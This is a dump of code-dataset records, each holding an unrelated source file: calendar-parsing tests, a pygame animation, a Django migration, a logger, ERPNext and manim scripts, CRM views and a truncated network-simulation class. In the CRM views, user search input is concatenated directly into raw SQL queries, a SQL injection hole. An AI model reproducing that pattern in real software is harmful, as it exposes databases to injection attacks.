\"check UTC offset without DST\")\n\n self.assertEqual(e2.start.day, 5, \"Check observance of exdate.\")\n\n def test_events_exdates(self):\n ical = \"test/test_data/recurring.ics\"\n start = date(2018, 6, 1)\n end = date(2018, 6, 30)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n self.assertEqual(evs[0].start.day, 1, \"check first recurrence.\")\n self.assertEqual(evs[1].start.day, 15, \"check first exdate.\")\n self.assertEqual(evs[2].start.day, 29, \"check second exdate.\")\n\n def test_events_all_day_recurring(self):\n ical = \"test/test_data/recurring.ics\"\n start = date(2018, 10, 30)\n end = date(2018, 10, 31)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n event_set = icalevents.events(url=None, file=ical, start=start, end=end)\n ev = event_set[0]\n\n self.assertEqual(len(event_set), 1)\n self.assertEqual(ev.summary, \"Recurring All-day Event\")\n self.assertEqual(ev.description, \"All-day event recurring on tuesday each week\")\n self.assertTrue(ev.all_day, \"Recurring All-day Event's first instance is an all-day event\")\n\n start_2nd_instance = date(2018, 11, 6)\n end_2nd_instance = date(2018, 11, 7)\n\n event_set2 = icalevents.events(url=None, file=ical, start=start_2nd_instance, end=end_2nd_instance)\n ev_2 = event_set2[0]\n\n self.assertEqual(len(event_set2), 1)\n self.assertEqual(ev_2.summary, \"Recurring All-day Event\")\n self.assertEqual(ev_2.description, \"All-day event recurring on tuesday each week\")\n self.assertTrue(ev_2.all_day, \"Recurring All-day Event's second instance is an all-day event\")\n\n def test_events_rrule_until(self):\n ical = \"test/test_data/rrule_until.ics\"\n start = date(2019, 4, 2)\n end = date(2019, 4, 3)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n self.assertEqual(len(evs), 2)\n self.assertEqual(evs[0].recurring, True)\n self.assertEqual(evs[0].summary, \"Recurring All-day Event\")\n self.assertEqual(evs[1].recurring, True)\n self.assertEqual(evs[1].summary, \"Daily lunch event\")\n\n def test_event_attributes(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 7, 12)\n end = date(2017, 7, 13)\n\n ev = icalevents.events(url=None, file=ical, start=start, end=end)[0]\n\n self.assertEqual(ev.summary, \"graue Restmülltonne\")\n self.assertEqual(ev.description, \"graue Restmülltonne nicht vergessen!\")\n self.assertTrue(ev.all_day)\n\n def test_event_recurring_attribute(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 7, 12)\n end = date(2017, 7, 13)\n\n ev = icalevents.events(url=None, file=ical, start=start, end=end)[0]\n self.assertEqual(ev.recurring, False, \"check recurring=False for non recurring event\")\n\n ical = \"test/test_data/recurring.ics\"\n start = date(2018, 10, 15)\n end = date(2018, 11, 15)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n e1 = evs[1]\n e2 = evs[2]\n self.assertEqual(e1.recurring, True, \"check recurring=True for recurring event (1)\")\n self.assertEqual(e2.recurring, True, \"check recurring=True for recurring event (2)\")\n\n def test_events_async_url(self):\n url = \"https://raw.githubusercontent.com/irgangla/icalevents/master/test/test_data/basic.ics\"\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n key = \"basic\"\n\n icalevents.events_async(key, url=url, file=None, start=start, end=end)\n\n sleep(4)\n\n self.assertTrue(icalevents.all_done(key), \"request is finished\")\n self.assertEqual(len(icalevents.latest_events(key)), 2, \"two events are found\")\n\n def test_events_async(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n key = \"basic\"\n\n icalevents.events_async(key, url=None, file=ical, start=start, end=end)\n\n sleep(4)\n\n self.assertTrue(icalevents.all_done(key), \"request is finished\")\n self.assertEqual(len(icalevents.latest_events(key)), 2, \"two events are found\")\n\n def test_request_data(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n key = \"basic\"\n\n icalevents.request_data(key, url=None, file=ical, string_content=None, start=start, end=end, fix_apple=False)\n\n self.assertTrue(icalevents.all_done(key), \"request is finished\")\n self.assertEqual(len(icalevents.latest_events(key)), 2, \"two events are found\")\n\n def test_string_data(self):\n ical = \"test/test_data/basic.ics\"\n\n with open(ical, mode='rb') as f:\n string_content = f.read()\n\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n key = \"basic\"\n\n icalevents.request_data(key, url=None, file=None, string_content=string_content, start=start, end=end,\n fix_apple=False)\n\n self.assertTrue(icalevents.all_done(key), \"request is finished\")\n self.assertEqual(len(icalevents.latest_events(key)), 2, \"two events are found\")\n\n def test_event_str(self):\n ical = \"test/test_data/duration.ics\"\n start = date(2018, 1, 1)\n end = date(2018, 2, 1)\n n = datetime.now(UTC)\n m = relativedelta(hour=0, minute=0, second=0, microsecond=0)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n e1 = evs[0]\n self.assertIsNotNone(search(r\"ended\", str(e1.copy_to(n - relativedelta(days=5) + m))), \"stringify past event\")\n self.assertIsNotNone(search(r\"today\", str(e1.copy_to(n - relativedelta(days=1) + m))),\n \"stringify ongoing event\")\n self.assertIsNotNone(search(r\"days left\", str(e1.copy_to(n + relativedelta(days=3) + m))),\n \"stringify future event\")\n\n e2 = evs[1]\n self.assertIsNotNone(search(r\"ended\", str(e2.copy_to(n - relativedelta(hours=5)))), \"stringify past event\")\n self.assertIsNotNone(search(r\"now\", str(e2.copy_to(n - relativedelta(hours=1)))), \"stringify ongoing event\")\n self.assertIsNotNone(search(r\"hours left\", str(e2.copy_to(n + relativedelta(hours=3)))),\n \"stringify future event\")\n self.assertIsNotNone(search(r\"days left\", str(e2.copy_to(n + relativedelta(days=3)))), \"stringify future event\")\n\n def test_events_no_description(self):\n ical = \"test/test_data/no_description.ics\"\n start = date(2018, 10, 15)\n end = date(2018, 11, 15)\n\n e1 = icalevents.events(file=ical, start=start, end=end)[0]\n\n self.assertEqual(e1.description, None)\n self.assertEqual(e1.summary, None)\n self.assertEqual(e1.location, None)\n\n def test_event_created_last_modified(self):\n ical = \"test/test_data/created_last_modified.ics\"\n start = date(2017, 7, 12)\n end = date(2017, 7, 15)\n\n events = icalevents.events(url=None, file=ical, start=start, end=end)\n\n self.assertEqual(events[0].created, datetime(2017, 1, 3, 7, 4, 1, tzinfo=UTC))\n self.assertEqual(events[0].last_modified, datetime(2017, 7, 11, 14, 0, 50, tzinfo=UTC))\n\n self.assertEqual(events[1].created, datetime(2017, 1, 4, 8, 4, 1, tzinfo=UTC))\n self.assertEqual(events[1].last_modified, datetime(2017, 1, 4, 8, 4, 1, tzinfo=UTC))\n\n self.assertEqual(events[2].created, None)\n self.assertEqual(events[2].last_modified, None)\n\n def test_event_categories(self):\n ical = \"test/test_data/categories_test.ics\"\n start = date(2020, 11, 10)\n end = date(2020, 11, 19)\n events = icalevents.events(url=None, file=ical, start=start, end=end)\n self.assertEqual(events[0].categories, [\"In19-S04-IT2403\"], \"event 1 is not equal\")\n self.assertEqual(events[1].categories, [\"In19-S04-IT2406\", \"In19-S04-IT2405\"], \"event 2 is not equal\")\n","sub_path":"test/test_icalevents.py","file_name":"test_icalevents.py","file_ext":"py","file_size_in_byte":10444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"52386711","text":"import pygame\r\nimport numpy as np\r\n\r\ndef transx(x, koordinates_of_O):\r\n return x - koordinates_of_O[0]\r\n\r\ndef transy(y, koordinates_of_O):\r\n return -y + koordinates_of_O[1]\r\n\r\ndef revers_transx(X, koordinates_of_O):\r\n return X + koordinates_of_O[0]\r\n\r\ndef reverse_transy(Y, koordinates_of_O):\r\n return -Y + koordinates_of_O[1]\r\n\r\ndef multyply_complex_numbers(Z1, Z2):\r\n x = Z1[0] * Z2[0] * (Z1[1] * Z2[1] - Z1[2] * Z2[2])\r\n y = Z1[0] * Z2[0] * (Z1[2] * Z2[1] + Z1[1] * Z2[2])\r\n return (x, y)\r\ndef get_center_color():\r\n return (np.random.randint(0, 255), np.random.randint(0, 255), np.random.randint(0, 255))\r\n\r\ndef rotate(coordinates, center_of_rotation, angle_in_radians, r):\r\n translated_coordinates = (transx(coordinates[0], center_of_rotation), \r\n transy(coordinates[1], center_of_rotation))\r\n Z1 = (1, translated_coordinates[0], translated_coordinates[1])\r\n Z2 = (r, np.cos(angle_in_radians), np.sin(angle_in_radians))\r\n translated_rotated_coordinates = multyply_complex_numbers(Z1, Z2)\r\n rotated_coordinates = (revers_transx(translated_rotated_coordinates[0], center_of_rotation),\r\n reverse_transy(translated_rotated_coordinates[1], center_of_rotation))\r\n return rotated_coordinates\r\n\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode((600, 600))\r\n\r\ncenters = [[(290, 20), get_center_color()]]\r\nfor i in range(11):\r\n rotated_coordinates = rotate(centers[i][0], (300, 300), np.pi/6, 1)\r\n next_center = [(rotated_coordinates[0], rotated_coordinates[1]), get_center_color()]\r\n centers.append(next_center)\r\n\r\nr1 = 0.9985\r\nr2 = 1 / 0.9985\r\nr = r1\r\niter_cnt = 2000\r\ncurr_iter = 1\r\n\r\ndone = False\r\nwhile not done:\r\n if curr_iter == iter_cnt:\r\n curr_iter = 1\r\n if r == r1: \r\n r = r2\r\n else:\r\n r = r1\r\n curr_iter += 1\r\n\r\n for i in range(len(centers)):\r\n centers[i][0] = rotate(centers[i][0], (300, 300), 0.001, 1)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n done = True\r\n screen.fill((0, 0, 0))\r\n for center in centers:\r\n pygame.draw.circle(screen, center[1], \r\n (int(center[0][0]), int(center[0][1])), 20)\r\n pygame.display.flip()","sub_path":"main3.pyw","file_name":"main3.pyw","file_ext":"pyw","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"23072185","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('subscribe', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='newsletter',\n name='mailbox',\n field=models.OneToOneField(to='django_mailbox.Mailbox', help_text=b'Die Adresse, die als Verteiler dienen soll.'),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='subscription',\n name='email_field',\n field=models.EmailField(db_column=b'email', max_length=75, blank=True, help_text=b'Nur n\\xc3\\xb6tig, wenn kein Konto ausgew\\xc3\\xa4hlt wird.', null=True, verbose_name=b'e-mail', db_index=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='subscription',\n name='user',\n field=models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, help_text=b'Nur n\\xc3\\xb6tig, wenn keine E-Mail-Adresse angegeben wird.', null=True, verbose_name=b'user'),\n preserve_default=True,\n ),\n ]\n","sub_path":"subscribe/migrations/0002_auto_20150107_1653.py","file_name":"0002_auto_20150107_1653.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470399184","text":"import datetime\nimport logging as logging\n\n\nclass LoggerUtils:\n \"\"\"\n Logger component. Private methods will be called by higher-level `Utils`.\n \"\"\"\n\n def __init__(self):\n self.logging = logging\n self.logging.basicConfig(\n format=\"%(asctime)s %(levelname)-4s %(message)s\",\n level=logging.INFO,\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n )\n pass\n\n def print_logm(self, message: str) -> None:\n \"\"\"\n Easy print log.\n\n Args:\n message (str): Message to print to `INFO` level.\n \"\"\"\n self.print_log({\"message\": message})\n return\n\n def print_log(self, data: dict):\n \"\"\"\n Prints a log to sys output.\n\n Args:\n data (dict): Keys include: `level`, `message`. Timestamp will automatically be included.\n `Level` will default to `INFO`.\n \"\"\"\n level = data.get(\"level\")\n if level is None:\n level = \"INFO\"\n if level == \"info\":\n self.logging.info(data[\"message\"])\n elif level == \"critical\":\n self.logging.critical(data[\"message\"])\n elif level == \"error\":\n self.logging.error(data[\"message\"])\n elif level == \"warning\":\n self.logging.warning(data[\"message\"])\n elif level ==\"debug\":\n self.logging.debug(data[\"message\"])\n else:\n self.logging.info(data[\"message\"])\n return\n\n def write_log(self, data: dict, filepath: str) -> bool:\n \"\"\"\n Prints and writes a log to disk.\n\n Args:\n filepath (str): Filepath of log to write to. Will default to latest log created in default directory.\n data (dict): Keys include: `level`, `text`. Timestamp will automatically be included.\n \"\"\"\n return\n","sub_path":"restless/components/utils/logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496636611","text":"import frappe\n\n\ndef create_item(product, store):\n if not product.sku:\n item_name = product.name[:140]\n item_code = frappe.get_value(\"Item\", {\"item_name\": item_name.strip()})\n else:\n item_code = frappe.get_value(\n \"Item\", {\"item_code\": product.sku.strip()})\n\n if item_code:\n return item_code\n\n item = frappe.new_doc(\"Item\")\n item.update({\n \"item_code\": product.sku or product.name[:140],\n \"item_name\": product.name[:140],\n \"item_group\": store.parent_doc.default_item_group,\n \"is_stock_item\": 1,\n \"include_item_in_manufacturing\": 0,\n \"description\": getattr(product, \"internal_notes\", product.name),\n \"weight_per_unit\": getattr(product, \"weight_oz\", 0),\n \"weight_uom\": \"Ounce\",\n \"end_of_life\": \"\"\n })\n\n if store.company:\n item.set(\"item_defaults\", [{\n \"company\": store.company,\n \"default_price_list\": \"ShipStation\",\n \"default_warehouse\": \"\", # leave unset\n \"buying_cost_center\": store.cost_center,\n \"selling_cost_center\": store.cost_center,\n \"expense_account\": store.expense_account,\n \"income_account\": store.sales_account\n }])\n\n item.save()\n return item.item_code\n","sub_path":"shipstation_integration/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"11645018","text":"# This is the file of the current scene being worked on.\n# Scenes are then archived in their respective episode folders.\n\nfrom manim import *\nfrom math import log2, e\nfrom classes import text\nfrom random import randint\n\nconfig.background_color = \"#0d121f\"\nconfig.max_files_cached = 1000\n\nclass Video(Scene):\n def construct(self):\n # chc1 = Tex(\"1. Experimental Technique\")\n # chc2 = Tex(\"2. Analytical Technique\").next_to(chc1, DOWN)\n # title = Tex(\"Two methods of analysis:\").next_to(chc1, UP)\n # tx = VGroup(chc1, chc2)\n # tx.arrange(DOWN, center=False, aligned_edge=LEFT)\n # self.play(Write(title), run_time=1.0)\n # self.play(Write(tx), run_time=1.0)\n # self.wait()\n # self.play(Indicate(chc1))\n # self.wait()\n # self.play(Indicate(chc2))\n # self.wait()\n\n # table = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # Pros & Cons \\\\\n # \\hline\n # Straightforward & Takes time to run \\\\\n # Robust and factual & Reliant on your machine \\\\\n # & \\textit{Hindi ibibigay sa exam} \\\\\n # \\end{tabular}\n # \"\"\")\n # title = Tex(\"The experimental technique\").next_to(table, UP)\n # self.play(Write(VGroup(title, table)))\n # self.wait()\n\n # t1 = Tex(r\"If you liked the video so far,\").move_to(UP*0.5)\n # t2 = Tex(r\"please support the channel by sharing!\").next_to(t1, DOWN)\n # self.play(Write(t1))\n # self.wait()\n # self.play(Write(t2))\n # self.wait()\n\n # table = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # & Runtime \\\\\n # \\hline\n # & $x$ \\\\\n # \\\\\n # & $y$ \\\\\n # & $z$ \\\\\n # \\end{tabular}\n # \"\"\")\n # table2 = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # & Runtime \\\\\n # \\hline\n # & $x$ \\\\\n # \\\\\n # & $k \\cdot y$ \\\\\n # & $z$ \\\\\n # \\end{tabular}\n # \"\"\")\n # self.play(Write(table))\n # self.wait()\n # self.play(Transform(table, table2))\n # self.wait()\n\n # table = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # & Runtime \\\\\n # \\hline\n # \\\\ \n # \\\\\n # & $n \\cdot n \\cdot c_{1}$ \\\\ \n # \\\\\n # \\\\\n # & $n \\cdot n \\cdot n \\cdot c_{2}$ \\\\\n # \\end{tabular}\n # \"\"\").move_to(LEFT*4)\n # eq1 = Tex(r\"$\\text{runtime} = n^{2}c_{1} \\cdot n^{3}c_{2} $\").next_to(table, DOWN+RIGHT)\n # eq2 = Tex(r\"$\\text{runtime} = O(n^3) $\").next_to(table, DOWN+RIGHT)\n # self.play(Write(table))\n # self.wait()\n # self.play(Write(eq1))\n # self.wait()\n # self.play(Transform(eq1, eq2))\n # self.wait()\n\n # table = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # & Runtime \\\\\n # \\hline\n # \\\\ \n # \\\\\n # \\\\\n # & $n \\cdot n \\cdot O(n)$ \\\\ \n # \\end{tabular}\n # \"\"\").move_to(LEFT*4)\n # eq1 = Tex(r\"$\\text{runtime} = n^{2}O(n)$\").next_to(table, DOWN+RIGHT)\n # eq2 = Tex(r\"$\\text{runtime} = O(n^3) $\").next_to(table, DOWN+RIGHT)\n # self.play(Write(table))\n # self.wait()\n # self.play(Write(eq1))\n # self.wait()\n # self.play(Transform(eq1, eq2))\n # self.wait()\n\n # table = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # & Runtime \\\\\n # \\hline\n # \\\\ \n # \\\\\n # \\\\\n # & $n \\cdot O(n^2)$ \\\\ \n # \\end{tabular}\n # \"\"\").move_to(LEFT*4)\n # eq1 = Tex(r\"$\\text{runtime} = nO(h^2) $\").next_to(table, UP+RIGHT)\n # eq2 = Tex(r\"$\\text{runtime} = nO(1) $\").next_to(table, UP+RIGHT)\n # eq3 = Tex(r\"$\\text{runtime} = O(n) $\").next_to(table, UP+RIGHT)\n # self.play(Write(table))\n # self.wait()\n # self.play(Write(eq1))\n # self.wait()\n # self.play(Transform(eq1, eq2))\n # self.wait()\n # self.play(Transform(eq1, eq3))\n # self.wait()\n\n table = Tex(r\"\"\"\n \\begin{tabular}{c|c}\n Pros & Cons \\\\\n \\hline\n Also robust, relies on logic & Prone to human error \\\\\n Faster to do, execution not needed & \\\\\n \\textit{Binibigay sa exam} & \\\\\n \\end{tabular}\n \"\"\")\n title = Tex(\"The analytical technique\").next_to(table, UP)\n self.play(Write(VGroup(title, table)))\n self.wait()\n","sub_path":"algorithm-analysis-1/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"574801418","text":"import re\nimport time\nfrom django.http.response import HttpResponse\nimport json\n\nfrom django.shortcuts import render\nfrom django.views.decorators.http import require_POST\n\nfrom crm.models import Customer, Nation, CommunicationSituation,\\\n CustomerGrade, PaymentTerm, Religion, SourceOfCustomer, Category\nfrom crm.utils import exception_logger\n\n\n@require_POST\n@exception_logger\ndef customer_list(request):\n customer_grade = request.POST.get('customer_grade')\n search = request.POST.get('search')\n nation = request.POST.get('nation')\n include = request.POST.get('include')\n page = request.POST.get('page')\n rows = request.POST.get('rows')\n rows = int(rows)\n page = int(page)\n start = (page-1)*rows\n end = page*rows\n if search is not None:\n sql = 'select t1.id,t1.company_name,t1.name,t1.nation,t1.email,t1.website,t1.history,t2.religion,t3.nation,t4.source \\\n from customer t1 left join religion t2 on t1.religion = t2.id \\\n left join nation t3 on t1.nation = t3.id \\\n left join source_of_customer t4 on t1.source_of_customer = t4.id \\\n where 1=1'\n search = search.split(' ')\n for item in search:\n if include == '1':\n if item == 'history':\n sql += ' and history <> 0'\n continue\n sql += ' and concat(t1.company_name,t1.name,t1.nation,t1.email,t1.website,t1.history,t2.religion,t3.nation,t4.source) \\\n like \"%%'+item+'%%\"'\n else:\n if item == 'history':\n sql += ' and history = 0'\n continue\n sql += ' and concat(t1.company_name,t1.name,t1.nation,t1.email,t1.website,t1.history,t2.religion,t3.nation,t4.source) \\\n not like \"%%'+item+'%%\"'\n objs = Customer.objects.raw(sql + ' and t1.customer_grade <> 4 order by t1.receive_time desc')\n objs = [item for item in objs]\n total = len(objs)\n objs = objs[start:end]\n elif customer_grade is not None and customer_grade != 'all':\n total = Customer.objects.filter(customer_grade=int(customer_grade)).count()\n objs = Customer.objects.filter(customer_grade=int(customer_grade)).order_by('-sort')[start:end]\n elif nation is not None and customer_grade != 'all':\n total = Customer.objects.filter(nation=nation).exclude(customer_grade=4).count()\n objs = Customer.objects.filter(nation=nation).exclude(customer_grade=4).order_by('-sort')[start:end]\n else:\n total = Customer.objects.exclude(customer_grade=4).count()\n objs = Customer.objects.raw(\"select id,sort,name,company_name,nation,email,website,history from customer \\\n where customer_grade <> 4 order by receive_time desc,id desc\")[start:end]\n data = []\n for item in objs:\n temp = {}\n if item.customer_grade == 1:\n temp.__setitem__('grade', '')\n elif item.customer_grade == 2:\n temp.__setitem__('grade', '')\n elif item.customer_grade == 3:\n temp.__setitem__('grade', '')\n elif item.customer_grade == 4:\n temp.__setitem__('grade', '')\n else:\n temp.__setitem__('grade', '#')\n temp.__setitem__('id', item.id)\n temp.__setitem__('company_name', item.company_name)\n temp.__setitem__('name', item.name)\n temp.__setitem__('nation', Nation.objects.filter(id=item.nation).first().nation)\n regex = re.compile(r\"\\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,4}\\b\", re.IGNORECASE)\n mails = re.findall(regex, item.email)\n temp.__setitem__('email', mails)\n temp.__setitem__('website', item.website)\n temp.__setitem__('history', item.history)\n temp.__setitem__('create_time', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(item.create_time)))\n data.append(temp)\n return HttpResponse(json.dumps({'total': total, 'rows': data}, ensure_ascii=False))\n\n\n@exception_logger\ndef get_communication_situation(request):\n objs = CommunicationSituation.objects.order_by('id').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.situation)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_customer_grade(request):\n objs = CustomerGrade.objects.order_by('id').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.grade)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_customer_grade_filter(request):\n objs = CustomerGrade.objects.order_by('id').all()\n data = [{'id': 'all', 'text': '全部客户'}]\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.grade)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_payment_term(request):\n objs = PaymentTerm.objects.order_by('id').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.term)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_religion(request):\n objs = Religion.objects.order_by('id').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.religion)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_source_of_customer(request):\n objs = SourceOfCustomer.objects.order_by('id').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.source)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_nation(request):\n objs = Nation.objects.order_by('nation').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.nation)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_product_category(request):\n objs = Category.objects.order_by('id').using('website').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('category', item.category)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@require_POST\n@exception_logger\ndef add_customer_settings_info(request):\n\n # {0:'customer_grade',1:'communication_situation',2:'source_of_customer',3:'religion',4:'payment_term',5:'nation'}\n\n data_type = request.POST.get('type')\n\n if data_type == '0':\n if CustomerGrade.objects.filter(grade__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n CustomerGrade.objects.create(grade=request.POST.get('data'))\n if data_type == '1':\n if CommunicationSituation.objects.filter(situation__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n CommunicationSituation.objects.create(situation=request.POST.get('data'))\n if data_type == '2':\n if SourceOfCustomer.objects.filter(source__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n SourceOfCustomer.objects.create(source=request.POST.get('data'))\n if data_type == '3':\n if Religion.objects.filter(religion__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n Religion.objects.create(religion=request.POST.get('data'))\n if data_type == '4':\n if PaymentTerm.objects.filter(term__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n PaymentTerm.objects.create(term=request.POST.get('data'))\n if data_type == '5':\n if Nation.objects.filter(nation__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n Nation.objects.create(nation=request.POST.get('data'))\n return HttpResponse('done')\n\n\n@exception_logger\ndef add_customer(request):\n if request.method == 'GET':\n return render(request, 'add_customer.html')\n if request.method == 'POST':\n info = request.POST.dict()\n info['name'] = str(info['name']).upper()\n info['create_time'] = int(time.time())\n Customer.objects.create(**info)\n return HttpResponse('done')\n\n\n@require_POST\n@exception_logger\ndef save_customer(request):\n cid = request.POST.get('id')\n new_data = request.POST.dict()\n new_data['name'] = str(new_data['name']).upper()\n del new_data['id']\n Customer.objects.filter(id=int(cid)).update(**new_data)\n return HttpResponse('done')\n\n\n@require_POST\n@exception_logger\ndef customer_detail(request):\n print(request.POST.get('id'))\n if '@' in request.POST.get('id'):\n obj = Customer.objects.filter(email__icontains=request.POST.get('id')).first()\n else:\n obj = Customer.objects.filter(id=int(request.POST.get('id'))).first()\n if obj:\n data = {}\n for item in obj._meta.fields:\n data.__setitem__(item.name, eval('obj.'+item.name))\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n else:\n return HttpResponse(json.dumps({'data': 'none'}, ensure_ascii=False))\n\n\n@require_POST\n@exception_logger\ndef customer_fast_search(request):\n search = request.POST.get('search')\n if search is not None:\n sql = 'select t1.id,t1.company_name,t1.name,t1.nation,t1.email,t1.website,t1.history,t2.religion,t3.nation,t4.source \\\n from customer t1 left join religion t2 on t1.religion = t2.id \\\n left join nation t3 on t1.nation = t3.id \\\n left join source_of_customer t4 on t1.source_of_customer = t4.id \\\n where t1.customer_grade <> 4 and 1=1'\n search = search.split(' ')\n for item in search:\n sql += ' and concat(t1.company_name,t1.name,t1.nation,t1.email,t1.website,t1.history,t2.religion,t3.nation,t4.source) \\\n like \"%%'+item+'%%\"'\n objs = Customer.objects.raw(sql + ' order by t1.sort desc')\n objs = [item for item in objs]\n total = len(objs)\n else:\n return HttpResponse('[]')\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('company_name', item.company_name)\n temp.__setitem__('name', item.name)\n temp.__setitem__('nation', Nation.objects.filter(id=item.nation).first().nation)\n temp.__setitem__('email', item.email)\n temp.__setitem__('website', item.website)\n temp.__setitem__('sort', item.sort)\n temp.__setitem__('history', item.history)\n data.append(temp)\n return HttpResponse(json.dumps({'total': total, 'rows': data}, ensure_ascii=False))\n","sub_path":"crm/customer_views.py","file_name":"customer_views.py","file_ext":"py","file_size_in_byte":11418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"137038408","text":"import globals\nimport math\n\nfrom host import Host\nfrom link import Link\nfrom packet import Packet\nfrom router import Router\n\nclass Flow:\n def __init__(self, id, source, destination, amount,\\\n start, track=True):\n '''\n The function initializes a flow object:\n Initial Arguments:\n - id (string) : id of the flow\n - source (string): id of the source of the flow\n - destination (string): id of the destination of the flow\n - amount (int): number of Megabytes to be sent\n - track (bool): used in determining if metrics should be tracked\n\n Attributes:\n - window_size (float) : size of the window used for sending packets\n - window_start (int) : packet number to start sending form\n - FR (int) : packet id of packet sent during fast recovery\n - rtt (float) : current round trip time\n - rto (float) : current timeout value\n - id (int) : id of the flow\n - source (Host/Router) : refers to source object of the flow\n - destination (Host/Router) : refers to the dest object of the flow\n - amount (int) : number of packets within the flow\n - start (float) : time the flow is scheduled to start\n - setRTT (bool) : determine if we have set an RTT yet\n - state (string) : determines what start the congestion control is in\n can take on values of \"slow_start\", \"congestion_avoidance\", \"fast_recovery\"\n - packets (List) : List of packets to be sent for the flow\n - done (bool) : flag to demonstrate if the flow has all been sent\n - ssthresh (int) : threshold for TCP Reno window size\n - send_times (dict) : dictionary of packet ids to send times of the packet\n contains only packets that have not yet been acked\n - dup_count (dict) : a dictionary of packet id and the number of times they\n have been sent, used to calculate the RTT using Karn's algo\n - duplicate_count (int) : number of consecutive duplicative acks received\n - duplicate_packet (int) : value of the duplicate acknowledgements\n - timeout_marker (float) : earliest time at which a packet has timed out\n - next_cut_time (float) : next time we can cut the window size, created to make sure\n we don't trigger a dangerous loop\n\n Variables for metric tracking:\n - track\n - frwindow\n - frsteps\n - rttwindow\n - rttsteps\n - added\n - successfullytransmitted\n - states_tracker : tracks the states the flow is in and when they switch.\n '''\n self.window_size = 1\n self.window_start = 0\n self.FR = -1\n\n self.rtt = 1\n self.rto = self.rtt\n self.id = id\n\n if source[0] == 'H':\n self.source = globals.idmapping['hosts'][source]\n else:\n self.source = globals.idmapping['routers'][source]\n if destination[0] == 'H':\n self.destination = globals.idmapping['hosts'][destination]\n else:\n 